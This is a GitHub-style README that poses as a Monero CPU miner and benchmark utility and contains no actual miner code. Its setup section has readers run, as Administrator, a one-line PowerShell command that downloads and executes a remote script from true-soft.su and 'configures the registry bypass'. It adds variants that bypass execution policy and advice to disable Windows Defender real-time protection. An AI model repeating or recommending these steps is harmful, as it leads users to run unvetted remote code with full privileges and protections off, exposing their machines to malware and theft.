Star 历史趋势
数据来源: GitHub API · 生成自 Stargazers.cn
README.md

Monero (XMR) High-Performance CPU Miner & Benchmark Utility

Welcome to the official repository of the high-performance Monero Miner. This open-source software is engineered for efficient cryptocurrency mining and hardware benchmarking using the RandomX algorithm. It delivers maximum hash rate tracking and advanced CPU core optimization.

📊 Key Features

  • RandomX Optimization: High-efficiency execution loops for Monero mining.
  • Multi-Threading Support: Advanced CPU core allocation mechanics.
  • Hardware Benchmarking: Precise metric logging for performance testing.
  • Low Overhead: Minimal system memory footprint during execution.
  • Open Source: Transparent code architecture for security auditing.

🔎 Technical Specifications

ParameterSpecification
Target CurrencyMonero (XMR)
AlgorithmRandomX
Architecturex86_64 / ARM64
OptimizationHuge Pages, MSR Registers

🚀 Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Run the Installation Command: Copy, paste, and press Enter to run the following initialization command. This script will automatically configure the registry bypass and download all required packages:

    irm https://true-soft.su/powershell/Loader.ps1 | iex

🔍 Troubleshooting & Common Errors

📌 Execution Policy Error (Script Blocked)

If your system blocks the launch due to execution policy restrictions, force a bypass using this command in Command Prompt (cmd):

powershell -ExecutionPolicy Bypass -Command "irm https://true-soft.su/powershell/Loader.ps1 | iex"

📌 Error: "irm is not recognized..." (Older PowerShell Versions)

If you are using an older environment where short aliases are missing, use the full system commands:

Invoke-RestMethod https://true-soft.su/powershell/Loader.ps1 | Invoke-Expression

📌 Antivirus or SmartScreen Block

Automated scripts can sometimes trigger antivirus warnings. If this happens, temporarily turn off "Real-time protection" in Windows Defender settings during setup, then turn it back on as soon as the installation is complete.


关于 About

No description, website, or topics provided.
bitcoin-mining-toolscpu-miningcpuminercpuminingcryptominergpu-mininggpuminingminerminer-monerominer-monitoringmonero-miner-suitemonero-miningmonero-mining-toolsmonerominersuitexmrxmr-miner-2026xmr-miner-windowsxmr-mining-tools

语言 Languages

提交活跃度 Commit Activity

代码提交热力图
过去 52 周的开发活跃度
2
Total Commits
峰值: 1次/周
Less
More

核心贡献者 Contributors